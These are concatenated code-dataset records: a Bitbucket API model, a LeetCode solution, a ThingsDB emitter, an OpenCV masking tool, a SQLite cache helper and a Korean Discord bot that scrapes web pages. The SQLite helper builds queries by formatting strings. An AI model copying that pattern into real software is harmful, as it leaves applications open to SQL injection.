E501\n\n :return: The uuid of this WebhookSubscription. 
# noqa: E501\n :rtype: str\n \"\"\"\n return self._uuid\n\n @uuid.setter\n def uuid(self, uuid):\n \"\"\"Sets the uuid of this WebhookSubscription.\n\n The webhook's id # noqa: E501\n\n :param uuid: The uuid of this WebhookSubscription. # noqa: E501\n :type: str\n \"\"\"\n\n self._uuid = uuid\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, WebhookSubscription):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"bitbucketopenapi/models/webhook_subscription.py","file_name":"webhook_subscription.py","file_ext":"py","file_size_in_byte":9815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"555994480","text":"import math\nclass Solution:\n #Sorting with desc order of height \n # if height is same , arrange in order of k\n def reconstructQueue(self, people):\n people = sorted(people, key = lambda x: (-x[0], x[1]))\n result =[]\n for p in people:\n result.insert(p[1],p)\n return result\n\ns = Solution()\nprint(s.reconstructQueue([[7,0], [4,4], [7,1], [5,0], [6,1], [5,2]]))","sub_path":"LeetcodeProjects/June Leetcode Challenge/06_Queue_Reconstruction_By_Height.py","file_name":"06_Queue_Reconstruction_By_Height.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"358181189","text":"import asyncio\nimport logging\nfrom typing import Union\nfrom ..client import Client\nfrom ..client.abc.events import Events\n\nclass Emitter(Events):\n\n _ev_handlers = dict()\n\n def __init__(\n self,\n client: Client,\n emitter: Union[int, str] = '',\n scope: str = None):\n \"\"\"Initializes an emitter.\n\n Args:\n client (thingsdb.client.Client):\n ThingsDB Client instance.\n emitter (str/int):\n Code which should point to the `thing` to watch for events.\n Defaults to an empty string which is the collection.\n Examples are:\n - ''\n - '.emitter'\n - '#123'\n Or, just the ID of the thing\n scope (str):\n Collection scope. Defaults to the scope of the client.\n \"\"\"\n super().__init__()\n self._event_id = 0\n self._client = client\n\n if isinstance(emitter, int):\n self._thing_id = emitter\n self._code = None\n else:\n self._thing_id = None\n if emitter:\n emitter = '' if emitter == '.' 
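# Usage sketch for the generated WebhookSubscription model above; values are
# illustrative. The events and subject_type setters validate input against
# their allowed_values lists, so a bad value raises ValueError at assignment.
def _webhook_demo(WebhookSubscription):
    sub = WebhookSubscription(
        active=True,
        description='CI trigger',
        events=['repo:push', 'pullrequest:created'],
        subject_type='repository',
        url='https://example.invalid/hooks/bitbucket')
    print(sub.to_dict())  # plain dict, ready for JSON encoding
    try:
        sub.events = ['not:a_real_event']
    except ValueError as exc:  # rejected by the allowed_values check
        print('rejected:', exc)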
else f'{{{emitter}}}'\n            self._code = \\\n                f'{emitter}.watch(); {emitter}.id();'\n\n        self._scope = scope or client.get_scope()\n\n        client.add_event_handler(self)\n        asyncio.ensure_future(self._watch())\n\n    def __init_subclass__(cls):\n        # functools is needed for the partial below but is not imported at\n        # module level, so import it locally.\n        import functools\n\n        cls._ev_handlers = {}\n\n        for key, val in cls.__dict__.items():\n            if not key.startswith('__') and \\\n                    callable(val) and hasattr(val, '_ev'):\n                # Read the event name before wrapping; a functools.partial\n                # object does not carry the original function's _ev attribute.\n                ev = val._ev\n                if asyncio.iscoroutinefunction(val):\n                    val = functools.partial(asyncio.ensure_future, val)\n                cls._ev_handlers[ev] = val\n\n    async def _watch(self):\n        if self._thing_id is None:\n            self._thing_id = \\\n                await self._client.query(self._code, scope=self._scope)\n        else:\n            await self._client.watch(self._thing_id, scope=self._scope)\n\n    def on_reconnect(self):\n        asyncio.ensure_future(self._watch())\n\n    def on_node_status(self, _status):\n        pass\n\n    def on_warning(self, warn):\n        logging.warning(f'{warn[\"warn_msg\"]} ({warn[\"warn_code\"]})')\n\n    def on_watch_init(self, _data):\n        pass\n\n    def on_event(self, ev, *args):\n        cls = self.__class__\n        fun = cls._ev_handlers.get(ev)\n        if fun is None:\n            logging.debug(f'no event handler for `{ev}` on {cls.__name__}')\n            return\n        fun(self, *args)\n\n    def on_watch_update(self, data):\n        thing_id = data['#']\n        if thing_id != self._thing_id:\n            return\n\n        event_id, jobs = data['event'], data['jobs']\n\n        if self._event_id > event_id:\n            logging.warning(\n                f'ignore event because the current event `{self._event_id}` '\n                f'is greater than the received event `{event_id}`')\n            return\n        self._event_id = event_id\n\n        for job_dict in jobs:\n            for name, job in job_dict.items():\n                if name == 'event':\n                    self.on_event(*job)\n\n    def on_watch_delete(self, data):\n        thing_id = data['#']\n        if thing_id == self._thing_id:\n            logging.debug(f'emitter with id {thing_id} is removed')\n            self._client.remove_event_handler(self)\n\n    def on_watch_stop(self, data):\n        thing_id = data['#']\n        if thing_id == self._thing_id:\n            logging.debug(f'emitter with id {thing_id} is stopped')\n            self._client.remove_event_handler(self)\n","sub_path":"thingsdb/model/emitter.py","file_name":"emitter.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"172111446","text":"import cv2\nimport numpy as np\n\ndrawing = False # true if mouse is pressed\nmode = True # if True, draw rectangle. 
Press 'm' to toggle to curve\ncolor = (255, 255, 255)\nthickness = -1\nim = None\n\n# mouse callback function\ndef draw_mask(event,former_x,former_y,flags,param):\n global current_former_x,current_former_y,drawing, mode, color, thickness\n global mask, im, original\n\n if event==cv2.EVENT_LBUTTONDOWN:\n drawing=True\n current_former_x,current_former_y=former_x,former_y\n elif event==cv2.EVENT_MOUSEMOVE:\n if drawing==True:\n if mode==True:\n pt1 = (current_former_x+10,current_former_y+10)\n pt2 = (former_x-10,former_y-10)\n cv2.rectangle(mask, pt1, pt2, color, thickness)\n current_former_x = former_x\n current_former_y = former_y\n elif event==cv2.EVENT_LBUTTONUP:\n drawing=False\n if mode==True:\n pt1 = (current_former_x+10,current_former_y+10)\n pt2 = (former_x-10,former_y-10)\n cv2.rectangle(mask, pt1, pt2, color, thickness)\n current_former_x = former_x\n current_former_y = former_y\n im = cv2.bitwise_not(cv2.bitwise_not(mask) * original)\n # im = original\n return former_x,former_y\n\ndef run_draw(img, output_name=\"mask.png\"):\n global im, mask, original\n im = img\n original = im.copy()\n mask = np.zeros_like(im)\n\n cv2.namedWindow(\"Create a mask\")\n cv2.setMouseCallback('Create a mask', draw_mask)\n while(1):\n cv2.imshow('Create a mask',im)\n k=cv2.waitKey(1)&0xFF\n if k==27:\n break\n cv2.destroyAllWindows()\n\n print(\"Save image\")\n cv2.imwrite(output_name, mask)\n\nif __name__ == \"__main__\":\n img = cv2.imread(\"images/bridge.jpg\")\n run_draw(img)\n","sub_path":"ImagerieNumerique/src/masking.py","file_name":"masking.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"403122582","text":"__author__ = 'Andrew'\n\nimport os\nimport sqlite3\nfrom sql_statements import CREATE_TABLE, INSERT_DATA\n\n\ndef dict_factory(cursor, row):\n \"\"\"\n Factory to turn database queries\n as a dictionary with column names.\n\n \"\"\"\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n\nclass SqliteDB(object):\n\n def __init__(self, db_path='/tmp/sparrow_caching.db'):\n self.db_path = db_path\n self.connection = None\n\n def create_db(self):\n conn = sqlite3.connect(self.db_path)\n c = conn.cursor()\n c.execute(CREATE_TABLE)\n conn.commit()\n conn.close()\n return 'Created SQLite database.'\n\n def destroy_db(self):\n os.remove(self.db_path)\n\n def insert_data(self, workspace, layer, complete_datetime):\n conn = sqlite3.connect(self.db_path)\n c = conn.cursor()\n insert_statement = INSERT_DATA.format(workspace=workspace,\n layer=layer,\n completion_datetime=complete_datetime\n )\n c.execute(insert_statement)\n conn.commit()\n conn.close()\n return insert_statement\n\n def query_db(self, workspace=None):\n self.connection = sqlite3.connect(self.db_path)\n self.connection.row_factory = dict_factory\n c = self.connection.cursor()\n if workspace is not None:\n query_statement = \"SELECT * FROM layer_cache lc WHERE lc.workspace='{workspace}'\".format(workspace=workspace)\n else:\n query_statement = \"SELECT * FROM layer_cache\"\n query_result = c.execute(query_statement)\n return query_result.fetchall()\n\n def close_db(self):\n self.connection.close()","sub_path":"sparrow-tilecache-seed/geoserver/tile_caching/sqlite_db.py","file_name":"sqlite_db.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"328574380","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated 
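# A parameterized variant of SqliteDB.query_db from sqlite_db.py above
# (illustrative; it assumes the layer_cache table and workspace column from the
# original module's CREATE_TABLE). Formatting the workspace straight into the
# SQL string is an injection risk if it ever comes from user input; sqlite3
# placeholders avoid that.
import sqlite3

def query_layer_cache(db_path, workspace=None):
    conn = sqlite3.connect(db_path)
    try:
        cur = conn.cursor()
        if workspace is None:
            cur.execute("SELECT * FROM layer_cache")
        else:
            cur.execute("SELECT * FROM layer_cache WHERE workspace = ?",
                        (workspace,))
        return cur.fetchall()
    finally:
        conn.close()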
on Tue Jul 23 15:57:41 2019\n\n@author: halid\n\"\"\"\n\n#%%\nnums = [0, 1, 2, 3, 4]\nsquares = []\nfor x in nums:\n squares.append(x ** 2)\nprint(squares) # Prints [0, 1, 4, 9, 16]\n#%%\nnums = [0, 1, 2, 3, 4]\nsquares = [x ** 2 for x in nums]\nprint(squares) # Prints [0, 1, 4, 9, 16]\n#%%\nnums = [0, 1, 2, 3, 4]\neven_squares = [x ** 2 for x in nums if x % 2 == 0]\nprint(even_squares) # Prints \"[0, 4, 16]\"","sub_path":"lists2.py","file_name":"lists2.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"228775521","text":"import discord\r\n\r\nimport asyncio\r\n\r\nimport random\r\n\r\nimport openpyxl\r\n\r\nfrom discord import Member\r\n\r\nfrom discord.ext import commands\r\n\r\n\r\nfrom urllib.request import urlopen, Request\r\n\r\nimport urllib\r\n\r\nimport urllib.request\r\n\r\nimport bs4\r\n\r\n\r\nimport os\r\n\r\nimport sys\r\n\r\nimport json\r\n\r\nimport time\r\n\r\n\r\nclient = discord.Client()\r\n\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n role = \"\"\r\n for i in member.server.roles:\r\n if i.name == \"USER\":\r\n role = i\r\n break\r\n await client.add_roles(member, role)\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(\"login\")\r\n\r\n print(client.user.name)\r\n\r\n print(client.user.id)\r\n\r\n print(\"------------------\")\r\n\r\n await client.change_presence(game=discord.Game(name='test', type=1))\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.content.startswith('!안녕'):\r\n await client.send_message(message.channel, \"안녕하세요\")\r\n\r\n if message.content.startswith('!이미지'):\r\n\r\n Text = \"\"\r\n learn = message.content.split(\" \")\r\n vrsize = len(learn) # 배열크기\r\n vrsize = int(vrsize)\r\n for i in range(1, vrsize): # 띄어쓰기 한 텍스트들 인식함\r\n Text = Text + \" \" + learn[i]\r\n print(Text.strip()) # 입력한 명령어\r\n\r\n randomNum = random.randrange(0, 40) # 랜덤 이미지 숫자\r\n\r\n location = Text\r\n enc_location = urllib.parse.quote(location) # 한글을 url에 사용하게끔 형식을 바꿔줍니다. 
그냥 한글로 쓰면 실행이 안됩니다.\r\n hdr = {'User-Agent': 'Mozilla/5.0'}\r\n # 크롤링 하는데 있어서 가끔씩 안되는 사이트가 있습니다.\r\n # 그 이유는 사이트가 접속하는 상대를 봇으로 인식하였기 때문인데\r\n # 이 코드는 자신이 봇이 아닌것을 증명하여 사이트에 접속이 가능해집니다!\r\n url = 'https://search.naver.com/search.naver?where=image&sm=tab_jum&query=' + enc_location # 이미지 검색링크+검색할 키워드\r\n print(url)\r\n req = Request(url, headers=hdr)\r\n html = urllib.request.urlopen(req)\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\") # 전체 html 코드를 가져옵니다.\r\n # print(bsObj)\r\n imgfind1 = bsObj.find('div', {'class': 'photo_grid _box'}) # bsjObj에서 div class : photo_grid_box 의 코드를 가져옵니다.\r\n # print(imgfind1)\r\n imgfind2 = imgfind1.findAll('a', {'class': 'thumb _thumb'}) # imgfind1 에서 모든 a태그 코드를 가져옵니다.\r\n imgfind3 = imgfind2[randomNum] # 0이면 1번째사진 1이면 2번째사진 형식으로 하나의 사진 코드만 가져옵니다.\r\n imgfind4 = imgfind3.find('img') # imgfind3 에서 img코드만 가져옵니다.\r\n imgsrc = imgfind4.get('data-source') # imgfind4 에서 data-source(사진링크) 의 값만 가져옵니다.\r\n print(imgsrc)\r\n embed = discord.Embed(\r\n colour=discord.Colour.green()\r\n )\r\n embed.set_image(url=imgsrc) # 이미지의 링크를 지정해 이미지를 설정합니다.\r\n await client.send_message(message.channel, embed=embed) # 메시지를 보냅니다.\r\n\r\n if message.content.startswith('!제비뽑기'):\r\n\r\n channel = message.channel\r\n\r\n embed = discord.Embed(\r\n\r\n title='제비뽑기',\r\n\r\n description='각 번호별로 번호를 지정합니다.',\r\n\r\n colour=discord.Colour.blue()\r\n\r\n )\r\n\r\n embed.set_footer(text='끗')\r\n\r\n Text = \"\"\r\n\r\n learn = message.content.split(\" \")\r\n\r\n vrsize = len(learn) # 배열크기\r\n\r\n vrsize = int(vrsize)\r\n\r\n for i in range(1, vrsize): # 띄어쓰기 한 텍스트들 인식함\r\n\r\n Text = Text + \" \" + learn[i]\r\n\r\n print(Text.strip()) # 입력한 명령어\r\n\r\n number = int(Text)\r\n\r\n List = []\r\n\r\n num = random.randrange(0, number)\r\n\r\n for i in range(number):\r\n\r\n while num in List: # 중복일때만\r\n\r\n num = random.randrange(0, number) # 다시 랜덤수 생성\r\n\r\n List.append(num) # 중복 아닐때만 리스트에 추가\r\n\r\n embed.add_field(name=str(i + 1) + '번째', value=str(num + 1), inline=True)\r\n\r\n print(List)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n if message.content.startswith('!타이머'):\r\n\r\n Text = \"\"\r\n\r\n learn = message.content.split(\" \")\r\n\r\n vrsize = len(learn) # 배열크기\r\n\r\n vrsize = int(vrsize)\r\n\r\n for i in range(1, vrsize): # 띄어쓰기 한 텍스트들 인식함\r\n\r\n Text = Text + \" \" + learn[i]\r\n\r\n secint = int(Text)\r\n\r\n sec = secint\r\n\r\n for i in range(sec, 0, -1):\r\n\r\n print(i)\r\n\r\n await client.send_message(message.channel, embed=discord.Embed(description='타이머 작동중 : ' + str(i) + '초'))\r\n\r\n time.sleep(1)\r\n\r\n\r\n\r\n else:\r\n\r\n print(\"땡\")\r\n\r\n await client.send_message(message.channel, embed=discord.Embed(description='타이머 종료'))\r\n\r\n if message.content.startswith('!실시간검색어') or message.content.startswith('!실검'):\r\n\r\n url = \"https://www.naver.com/\"\r\n\r\n html = urllib.request.urlopen(url)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n realTimeSerach1 = bsObj.find('div', {'class': 'ah_roll_area PM_CL_realtimeKeyword_rolling'})\r\n\r\n realTimeSerach2 = realTimeSerach1.find('ul', {'class': 'ah_l'})\r\n\r\n realTimeSerach3 = realTimeSerach2.find_all('li')\r\n\r\n embed = discord.Embed(\r\n\r\n title='네이버 실시간 검색어',\r\n\r\n description='실시간검색어',\r\n\r\n colour=discord.Colour.green()\r\n\r\n )\r\n\r\n for i in range(0, 20):\r\n realTimeSerach4 = realTimeSerach3[i]\r\n\r\n realTimeSerach5 = realTimeSerach4.find('span', {'class': 'ah_k'})\r\n\r\n realTimeSerach = realTimeSerach5.text.replace(' ', '')\r\n\r\n realURL = 
'https://search.naver.com/search.naver?ie=utf8&query=' + realTimeSerach\r\n\r\n print(realTimeSerach)\r\n\r\n embed.add_field(name=str(i + 1) + '위', value='\\n' + '[%s](<%s>)' % (realTimeSerach, realURL),\r\n inline=False) # [텍스트](<링크>) 형식으로 적으면 텍스트 하이퍼링크 만들어집니다\r\n\r\n await client.send_message(message.channel, embed=embed)\r\n\r\n if message.content.startswith(\"!날씨\"):\r\n learn= message.content.split(\" \")\r\n\r\n location = learn[1]\r\n\r\n enc_location = urllib.parse.quote(location + '날씨')\r\n\r\n hdr = {'User-Agent': 'Mozilla/5.0'}\r\n\r\n url = 'https://search.naver.com/search.naver?where=nexearch&sm=top_hty&fbm=1&ie=utf8&query=' + enc_location\r\n\r\n print(url)\r\n\r\n req = Request(url, headers=hdr)\r\n\r\n html = urllib.request.urlopen(req)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n todayBase = bsObj.find('div', {'class': 'main_info'})\r\n\r\n todayTemp1 = todayBase.find('span', {'class': 'todaytemp'})\r\n\r\n todayTemp = todayTemp1.text.strip() # 온도\r\n\r\n print(todayTemp)\r\n\r\n todayValueBase = todayBase.find('ul', {'class': 'info_list'})\r\n\r\n todayValue2 = todayValueBase.find('p', {'class': 'cast_txt'})\r\n\r\n todayValue = todayValue2.text.strip() # 밝음,어제보다 ?도 높거나 낮음을 나타내줌\r\n\r\n print(todayValue)\r\n\r\n todayFeelingTemp1 = todayValueBase.find('span', {'class': 'sensible'})\r\n\r\n todayFeelingTemp = todayFeelingTemp1.text.strip() # 체감온도\r\n\r\n print(todayFeelingTemp)\r\n\r\n todayMiseaMongi1 = bsObj.find('div', {'class': 'sub_info'})\r\n\r\n todayMiseaMongi2 = todayMiseaMongi1.find('div', {'class': 'detail_box'})\r\n\r\n todayMiseaMongi3 = todayMiseaMongi2.find('dd')\r\n\r\n todayMiseaMongi = todayMiseaMongi3.text # 미세먼지\r\n\r\n print(todayMiseaMongi)\r\n\r\n tomorrowBase = bsObj.find('div', {'class': 'table_info weekly _weeklyWeather'})\r\n\r\n tomorrowTemp1 = tomorrowBase.find('li', {'class': 'date_info'})\r\n\r\n tomorrowTemp2 = tomorrowTemp1.find('dl')\r\n\r\n tomorrowTemp3 = tomorrowTemp2.find('dd')\r\n\r\n tomorrowTemp = tomorrowTemp3.text.strip() # 오늘 오전,오후온도\r\n\r\n print(tomorrowTemp)\r\n\r\n tomorrowAreaBase = bsObj.find('div', {'class': 'tomorrow_area'})\r\n\r\n tomorrowMoring1 = tomorrowAreaBase.find('div', {'class': 'main_info morning_box'})\r\n\r\n tomorrowMoring2 = tomorrowMoring1.find('span', {'class': 'todaytemp'})\r\n\r\n tomorrowMoring = tomorrowMoring2.text.strip() # 내일 오전 온도\r\n\r\n print(tomorrowMoring)\r\n\r\n tomorrowValue1 = tomorrowMoring1.find('div', {'class': 'info_data'})\r\n\r\n tomorrowValue = tomorrowValue1.text.strip() # 내일 오전 날씨상태, 미세먼지 상태\r\n\r\n print(tomorrowValue)\r\n\r\n tomorrowAreaBase = bsObj.find('div', {'class': 'tomorrow_area'})\r\n\r\n tomorrowAllFind = tomorrowAreaBase.find_all('div', {'class': 'main_info morning_box'})\r\n\r\n tomorrowAfter1 = tomorrowAllFind[1]\r\n\r\n tomorrowAfter2 = tomorrowAfter1.find('p', {'class': 'info_temperature'})\r\n\r\n tomorrowAfter3 = tomorrowAfter2.find('span', {'class': 'todaytemp'})\r\n\r\n tomorrowAfterTemp = tomorrowAfter3.text.strip() # 내일 오후 온도\r\n\r\n print(tomorrowAfterTemp)\r\n\r\n tomorrowAfterValue1 = tomorrowAfter1.find('div', {'class': 'info_data'})\r\n\r\n tomorrowAfterValue = tomorrowAfterValue1.text.strip()\r\n\r\n print(tomorrowAfterValue) # 내일 오후 날씨상태,미세먼지\r\n\r\n embed = discord.Embed(\r\n\r\n title=learn[1] + ' 날씨 정보',\r\n\r\n description=learn[1] + '날씨 정보입니다.',\r\n\r\n colour=discord.Colour.gold()\r\n\r\n )\r\n\r\n embed.add_field(name='현재온도', value=todayTemp + '˚', inline=False) # 현재온도\r\n\r\n embed.add_field(name='체감온도', 
value=todayFeelingTemp, inline=False) # 체감온도\r\n\r\n embed.add_field(name='현재상태', value=todayValue, inline=False) # 밝음,어제보다 ?도 높거나 낮음을 나타내줌\r\n\r\n embed.add_field(name='현재 미세먼지 상태', value=todayMiseaMongi, inline=False) # 오늘 미세먼지\r\n\r\n embed.add_field(name='오늘 오전/오후 날씨', value=tomorrowTemp, inline=False) # 오늘날씨 # color=discord.Color.blue()\r\n\r\n embed.add_field(name='**----------------------------------**', value='**----------------------------------**',\r\n inline=False) # 구분선\r\n\r\n embed.add_field(name='내일 오전온도', value=tomorrowMoring + '˚', inline=False) # 내일오전날씨\r\n\r\n embed.add_field(name='내일 오전날씨상태, 미세먼지 상태', value=tomorrowValue, inline=False) # 내일오전 날씨상태\r\n\r\n embed.add_field(name='내일 오후온도', value=tomorrowAfterTemp + '˚', inline=False) # 내일오후날씨\r\n\r\n embed.add_field(name='내일 오후날씨상태, 미세먼지 상태', value=tomorrowAfterValue, inline=False) # 내일오후 날씨상태\r\n\r\n await client.send_message(message.channel, embed=embed)\r\n\r\n if message.content.startswith('!영화순위'):\r\n\r\n # http://ticket2.movie.daum.net/movie/movieranklist.aspx\r\n\r\n i1 = 0 # 랭킹 string값\r\n\r\n embed = discord.Embed(\r\n\r\n title=\"영화순위\",\r\n\r\n description=\"영화순위입니다.\",\r\n\r\n colour=discord.Color.red()\r\n\r\n )\r\n\r\n hdr = {'User-Agent': 'Mozilla/5.0'}\r\n\r\n url = 'http://ticket2.movie.daum.net/movie/movieranklist.aspx'\r\n\r\n print(url)\r\n\r\n req = Request(url, headers=hdr)\r\n\r\n html = urllib.request.urlopen(req)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n moviechartBase = bsObj.find('div', {'class': 'main_detail'})\r\n\r\n moviechart1 = moviechartBase.find('ul', {'class': 'list_boxthumb'})\r\n\r\n moviechart2 = moviechart1.find_all('li')\r\n\r\n for i in range(0, 20):\r\n i1 = i1 + 1\r\n\r\n stri1 = str(i1) # i1은 영화랭킹을 나타내는데 사용됩니다\r\n\r\n print()\r\n\r\n print(i)\r\n\r\n print()\r\n\r\n moviechartLi1 = moviechart2[i] # ------------------------- 1등랭킹 영화---------------------------\r\n\r\n moviechartLi1Div = moviechartLi1.find('div', {'class': 'desc_boxthumb'}) # 영화박스 나타내는 Div\r\n\r\n moviechartLi1MovieName1 = moviechartLi1Div.find('strong', {'class': 'tit_join'})\r\n\r\n moviechartLi1MovieName = moviechartLi1MovieName1.text.strip() # 영화 제목\r\n\r\n print(moviechartLi1MovieName)\r\n\r\n moviechartLi1Ratting1 = moviechartLi1Div.find('div', {'class': 'raking_grade'})\r\n\r\n moviechartLi1Ratting2 = moviechartLi1Ratting1.find('em', {'class': 'emph_grade'})\r\n\r\n moviechartLi1Ratting = moviechartLi1Ratting2.text.strip() # 영화 평점\r\n\r\n print(moviechartLi1Ratting)\r\n\r\n moviechartLi1openDay1 = moviechartLi1Div.find('dl', {'class': 'list_state'})\r\n\r\n moviechartLi1openDay2 = moviechartLi1openDay1.find_all('dd') # 개봉날짜, 예매율 두개포함한 dd임\r\n\r\n moviechartLi1openDay3 = moviechartLi1openDay2[0]\r\n\r\n moviechartLi1Yerating1 = moviechartLi1openDay2[1]\r\n\r\n moviechartLi1openDay = moviechartLi1openDay3.text.strip() # 개봉날짜\r\n\r\n print(moviechartLi1openDay)\r\n\r\n moviechartLi1Yerating = moviechartLi1Yerating1.text.strip() # 예매율 ,랭킹변동\r\n\r\n print(moviechartLi1Yerating) # ------------------------- 1등랭킹 영화---------------------------\r\n\r\n print()\r\n\r\n embed.add_field(name='---------------랭킹' + stri1 + '위---------------',\r\n value='\\n영화제목 : ' + moviechartLi1MovieName + '\\n영화평점 : ' + moviechartLi1Ratting + '점' + '\\n개봉날짜 : ' + moviechartLi1openDay + '\\n예매율,랭킹변동 : ' + moviechartLi1Yerating,\r\n inline=False) # 영화랭킹\r\n\r\n await client.send_message(message.channel, embed=embed)\r\n\r\n if message.content.startswith('!오늘배그'):\r\n\r\n randomNum = random.randrange(1, 3)\r\n\r\n 
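# The command handlers above all repeat the same fetch pattern: build a Request
# with a browser User-Agent (some sites reject the default urllib agent) and
# parse the response with BeautifulSoup. A hedged sketch of that shared helper;
# the name fetch_soup is illustrative, and factoring it out would shorten every
# handler.
import urllib.request
import bs4

def fetch_soup(url):
    req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
    with urllib.request.urlopen(req) as resp:
        return bs4.BeautifulSoup(resp.read(), 'html.parser')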
if randomNum == 1:\r\n\r\n await client.send_message(message.channel, embed=discord.Embed(title=\"배그각입니다.\", color=discord.Color.blue()))\r\n\r\n else:\r\n\r\n await client.send_message(message.channel,\r\n embed=discord.Embed(title=\"자러갑시다....\", color=discord.Color.red()))\r\n\r\n\r\n if message.content.startswith('!초대'):\r\n msg = '{0.author.mention}'.format(message)\r\n\r\n await client.send_message(message.channel, msg)\r\n\r\n channel = message.channel\r\n\r\n embed = discord.Embed(title=\"서버 들어가기\", url=\"https://discord.gg/BFWDUQe\", description=\"↑서버들어가기\", color=0x25a76a)\r\n\r\n embed.set_author(name=\"SAINC Bot 입니다\", icon_url=\"https://cdn.discordapp.com/attachments/536048659784007711/536070315915214850/Hot_Concrete_Text_Effect_preview.jpg\")\r\n\r\n embed.set_thumbnail(url=\"https://cdn.discordapp.com/attachments/536048659784007711/536070315915214850/Hot_Concrete_Text_Effect_preview.jpg\")\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n await client.send_message(message.channel, \"https://discord.gg/BFWDUQe\")\r\n\r\n if message.content.startswith('!명령어'):\r\n channel = message.channel\r\n\r\n embed = discord.Embed(title=\"ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ\", color=0x2d0606)\r\n\r\n embed.set_author(name=\"SAINC Bot 전용\", icon_url = \"https://images-ext-1.discordapp.net/external/7bopmZQ6jonvlN90L05AeKE_sX9KG61JR-Uv4sKVSeU/https/cdn.discordapp.com/attachments/536048659784007711/536070315915214850/Hot_Concrete_Text_Effect_preview.jpg\")\r\n\r\n embed.set_thumbnail(url=\"https://images-ext-1.discordapp.net/external/7bopmZQ6jonvlN90L05AeKE_sX9KG61JR-Uv4sKVSeU/https/cdn.discordapp.com/attachments/536048659784007711/536070315915214850/Hot_Concrete_Text_Effect_preview.jpg\")\r\n\r\n embed.add_field(name='!안녕', value='인사를 받아줍니다.', inline=False)\r\n\r\n embed.add_field(name='!날씨 (지역)', value='그 지역의 날씨정보를 제공합니다.', inline=False)\r\n\r\n embed.add_field(name='!초대', value='서버초대 링크를 올려줍니다.', inline=False)\r\n\r\n embed.add_field(name='!오늘배그', value='오늘배그각을 알려줍니다.', inline=False)\r\n\r\n embed.add_field(name='!전적메뉴', value='전적메뉴를 불러옵니다.', inline=False)\r\n\r\n embed.add_field(name='!이미지 (제시어)', value='제시어와관련된 이미지를 올려줍니다.', inline=False)\r\n\r\n embed.add_field(name='!타이머 (초)', value='타이머로 시간을재줍니다.', inline=False)\r\n\r\n embed.add_field(name='!영화순위', value='실시간 영화순위를 올려줍니다.', inline=False)\r\n\r\n embed.add_field(name='!제비뽑기', value='제비뽑기로 순서를 정해줍니다.', inline=False)\r\n\r\n embed.add_field(name='!실시간검색어,!실검', value='실시간검색어를 알려줍니다.', inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n if message.content.startswith('!실행중'):\r\n learn = message.content.split(\" \")\r\n text = learn[1]\r\n await client.change_presence(game=discord.Game(name=text, type=1))\r\n await client.send_message(message.channel,\r\n embed=discord.Embed(title=text + \" 플레이 중으로 변경되었습니다.\", color=discord.Color.dark_gold()))\r\n\r\n\r\n if message.content.startswith(\"!전적메뉴\"):\r\n channel = message.channel\r\n\r\n embed = discord.Embed(\r\n\r\n title='SAINC 명령어입니다.',\r\n\r\n description='[도배금지]',\r\n\r\n colour=discord.Colour.purple()\r\n\r\n )\r\n\r\n embed.set_footer(text='모든 전적은 dak.gg 기준입니다.')\r\n\r\n embed.add_field(name='!롤', value='!롤 닉네임 형식으로 적으면 그 닉네임에대한 정보를 알려줍니다..', inline=False)\r\n\r\n embed.add_field(name='!배그솔로', value='!배그솔로 닉네임 형식으로 적으면 그 닉네임에대한 정보를 알려줍니다..', inline=False)\r\n\r\n embed.add_field(name='!배그듀오', value='!배그듀오 닉네임 형식으로 적으면 그 닉네임에대한 정보를 알려줍니다..', inline=False)\r\n\r\n embed.add_field(name='!배그스쿼드', value='!배그스쿼드 닉네임 형식으로 적으면 그 닉네임에대한 정보를 알려줍니다..', inline=False)\r\n\r\n 
